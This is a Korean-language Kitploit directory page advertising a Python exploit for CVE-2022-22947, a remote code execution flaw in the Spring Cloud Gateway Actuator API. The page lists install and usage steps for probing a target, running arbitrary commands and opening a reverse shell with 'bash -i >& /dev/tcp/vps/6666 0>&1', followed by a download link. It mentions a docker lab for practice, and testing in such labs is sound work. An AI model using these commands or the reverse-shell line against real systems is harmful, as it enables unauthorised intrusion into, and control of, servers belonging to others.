Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
spring-cloud-gateway-rce — CVE-2022-22947(Spring Cloud Gateway RCE)에 대한 Python 익스플로잇으로, Actuator API SpEL 주입을 통한 명령 실행, 리버스 셸 및 취약점 탐지를 지원합니다. | Kitploit
도구/GitHubGitHub/k3rwin/spring-cloud-gateway-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubk3rwin/spring-cloud-gateway-rce

spring-cloud-gateway-rce

CVE-2022-22947(Spring Cloud Gateway RCE)에 대한 Python 익스플로잇으로, Actuator API SpEL 주입을 통한 명령 실행, 리버스 셸 및 취약점 탐지를 지원합니다.

저장소 보기
12314년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Spring Cloud Gateway Actuator API SpEL 표현식 삽입 명령 실행 (CVE-2022-22947)

1.설치

root@kitploit:~
pip3 install -r requirements.txt

2.사용법

root@kitploit:~
$ python3 spring-cloud-gateway-rce.py -h

   ___             __         ____    ___   ____   ____          ____   ____    ___   _  _    _____
  / __\ /\   /\   /__\       |___ \  / _ \ |___ \ |___ \        |___ \ |___ \  / _ \ | || |  |___  |
 / /    \ \ / /  /_\   _____   __) || | | |  __) |  __) | _____   __) |  __) || (_) || || |_    / /
/ /___   \ V /  //__  |_____| / __/ | |_| | / __/  / __/ |_____| / __/  / __/  \__, ||__   _|  / /
\____/    \_/   \__/         |_____| \___/ |_____||_____|       |_____||_____|   /_/    |_|   /_/


                                        CVE-2022-22947 Spring Cloud Gateway RCE
                                                                  By:K3rwin
usage: spring-cloud-gateway-rce.py [-h] [-u URL] [-c CMD] [-s SYSTEM]

Spring Cloud Gateway RCE 도움말 안내

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL 지정
  -c CMD, --cmd CMD     실행할 명령 지정, 기본값 whoami
  -s SYSTEM, --system SYSTEM
                        대상 호스트 운영체제 지정, 기본값 linux, 인수: win/linux

3.예제

① -u 취약점 탐지

root@kitploit:~
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/"

image-20220313174120379

② -c 명령어 지정 실행

root@kitploit:~
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "ip add"

image-20220313174205428

③ 리버스 셸

root@kitploit:~
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "bash -i >& /dev/tcp/vps/6666 0>&1"

image-20220313175050373

docker 실습 환경

vulfocus

image-20220313175230109

도구 다운로드